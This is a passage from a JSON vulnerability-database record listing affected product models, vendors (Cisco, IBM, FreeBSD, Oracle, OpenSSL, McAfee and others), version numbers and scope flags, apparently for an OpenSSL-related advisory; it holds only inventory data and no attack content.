meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.6" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.131" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "10.1-release-p26", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "cognos insight fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.26" }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.6" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "9.3-release-p22", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p28", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.5" }, { "model": "mq light client module for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2014091001" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.157" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.1" }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "10.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p27", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "mq light client module for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2014090800" }, { "model": "10.2-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack interix fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.17" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.2.1" }, { "model": "cognos tm1 interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p36", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "powerkvm sp3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.14" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "videoscape control suite foundation", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.11" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "9.3-release-p35", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.19" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.0.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "infosphere master data management provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.0.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.20" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smartcloud entry appliance fixpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.15" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "netezza diagnostics tools", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.2" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.7" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.3" }, { "model": "cognos tm1 fix pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.26" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.10" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.0" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.10" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise session border controller ecz7.3m2p2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.12" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "infosphere data explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "agent desktop", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.9" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "9.3-release-p21", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cisco directors and switches with nx-os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.4" }, { "model": "smartcloud entry appliance fixpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "10.1-release-p29", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "nx-os nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.6" }, { "model": "mobility services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "netezza diagnostics tools", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.1" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "16.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "10.2-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5" }, { "model": "mq light client module for node.js 1.0.2014091000-red", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.18" }, { "model": "9.3-release-p33", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.8" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.2" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.21" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "ethernet switch 40g 10g", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "642.0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "10.1-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "ethernet switch 40g 10g", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "722.0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.13" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.2g", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cisco directors and switches with nx-os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "project openssl 1.0.2f", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3x000" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "nx-os nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "solaris sru", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.36.5" }, { "model": "oss support tools oracle explorer", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.0.2" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "9.3-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "smartcloud entry appliance fixpac", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.4" }, { "model": "project openssl 1.0.1r", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cisco directors and switches with nx-os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87107010" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.13" }, { "model": "tivoli netcool reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "10.2-release-p12", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "infosphere data explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2-4" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.4" }, { "model": "10.2-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": 